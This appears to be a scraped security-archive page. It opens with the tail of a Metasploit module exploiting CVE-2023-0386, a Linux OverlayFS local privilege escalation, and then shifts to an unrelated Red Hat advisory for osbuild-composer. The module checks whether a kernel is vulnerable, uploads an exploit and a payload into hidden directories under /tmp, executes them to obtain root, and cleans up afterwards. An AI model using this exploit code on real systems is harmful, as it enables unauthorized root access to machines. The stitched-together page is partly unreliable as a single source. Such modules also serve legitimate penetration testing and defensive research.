'https://www.vicarius.io/vsociety/posts/cve-2023-0386-a-linux-kernel-bug-in-overlayfs' ],        ],        'Notes' => {          'Reliability' => [ REPEATABLE_SESSION ],          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK ]        }      )    )    register_options([      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),      OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', '60' ])    ])    register_advanced_options([      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ])  end  def check    unless kernel_arch.include?('x64')      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")    end    kernel_version = Rex::Version.new(kernel_release.split('-').first)    if kernel_version < Rex::Version.new('5.11') ||       kernel_version.between?(Rex::Version.new('5.15.91'), Rex::Version.new('5.16')) ||       Rex::Version.new('6.1.9') <= kernel_version      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")    end    unless userns_enabled?      return CheckCode::Safe('Unprivileged user namespaces are not permitted')    end    vprint_good('Unprivileged user namespaces are permitted')    CheckCode::Appears("Linux kernel version found: #{kernel_version}")  end  def base_dir    datastore['WritableDir'].to_s  end  def exploit    if !datastore['ForceExploit'] && is_root?      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')    end    unless writable?(base_dir)      fail_with(Failure::BadConfig, "#{base_dir} is not writable")    end    # Upload exploit executable    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(exploit_dir)    register_dir_for_cleanup(exploit_dir)    if live_compile?      vprint_status('Live compiling exploit on system...')      upload_and_compile(exploit_path, exploit_source('CVE-2023-0386', 'cve_2023_0386.c'), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')    else      vprint_status('Dropping pre-compiled exploit on system...')      upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))    end    # Upload payload executable    payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    upload_and_chmodx(payload_path, generate_payload_exe)    # Launch exploit    print_status('Launching exploit...')    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Running: #{cmd_string}")    begin      output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])      vprint_status(output)    rescue Error => e      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)      print_error("Exploit failed: #{e}")    ensure      # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.      cmd_exec("rm -rf '#{exploit_dir}'")    end  endend

Linux OverlayFS Local Privilege Escalation

Red Hat Security Advisory 2024-7262-03 - An update for osbuild-composer is now available for Red Hat Enterprise Linux 8. Issues addressed include a memory leak vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7262.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: osbuild-composer security updateAdvisory ID:        RHSA-2024:7262-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7262Issue date:         2024-09-27Revision:           03CVE Names:          CVE-2024-1394====================================================================Summary: An update for osbuild-composer is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:A service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Besides building images for local usage, it can also upload images directly to cloud.  It is compatible with composer-cli and cockpit-composer clients.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1394References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2262921https://bugzilla.redhat.com/show_bug.cgi?id=2310528

Tag

#linux